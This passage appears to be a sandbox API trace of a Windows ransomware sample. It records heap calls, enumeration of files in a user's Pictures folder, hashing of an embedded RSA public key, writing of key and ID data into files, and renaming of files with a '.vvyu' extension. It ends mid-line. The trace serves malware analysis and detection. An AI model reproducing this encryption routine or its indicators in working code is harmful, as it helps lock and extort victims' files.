0x2e95ea0 [0199.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea6970 [0199.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0199.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0199.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.784] GetCurrentThreadId () returned 0x66c [0199.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3260 [0199.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3200 [0199.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3218 [0199.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31e8 [0199.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3278 [0199.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0199.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3248 [0199.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3230 [0199.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3290 [0199.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3230 [0199.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0199.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3200 [0199.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0199.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0199.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0199.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0199.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0199.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0199.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f660 | out: hHeap=0x620000) returned 1 [0199.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.797] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x163b7, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x163b7, lpOverlapped=0x0) returned 1 [0199.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.798] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x163bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.799] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.800] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.800] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.800] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.800] CloseHandle (hObject=0x510) returned 1 [0199.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0199.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.812] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\7Wfuj5RqE1i.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\7wfuj5rqe1i.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\7Wfuj5RqE1i.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\7wfuj5rqe1i.gif.vvyu")) returned 1 [0199.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.814] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0199.817] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dddff60, ftCreationTime.dwHighDateTime=0x1d8a072, ftLastAccessTime.dwLowDateTime=0x9475ec90, ftLastAccessTime.dwHighDateTime=0x1d8a35a, ftLastWriteTime.dwLowDateTime=0x9475ec90, ftLastWriteTime.dwHighDateTime=0x1d8a35a, nFileSizeHigh=0x0, nFileSizeLow=0x676b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ae6i4Hslrl.png", cAlternateFileName="AE6I4H~1.PNG")) returned 1 [0199.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e91710 [0199.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.818] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\Ae6i4Hslrl.png") returned=".png" [0199.818] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\Ae6i4Hslrl.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\ae6i4hslrl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.819] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=26475) returned 1 [0199.819] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.823] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x6745, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.823] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.825] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.825] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x676b, lpOverlapped=0x0) returned 1 [0199.826] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.826] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.826] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.826] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0199.828] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.828] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.828] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.828] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.828] GetLastError () returned 0x0 [0199.828] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.828] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0199.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.829] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.829] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.829] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6770) returned 0x2ea99b0 [0199.829] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f660 [0199.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31d0 [0199.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f6a8 [0199.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31e8 [0199.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3218 [0199.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3278 [0199.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3230 [0199.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.830] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3278 [0199.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0199.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3230 [0199.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3218 [0199.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0199.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0199.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 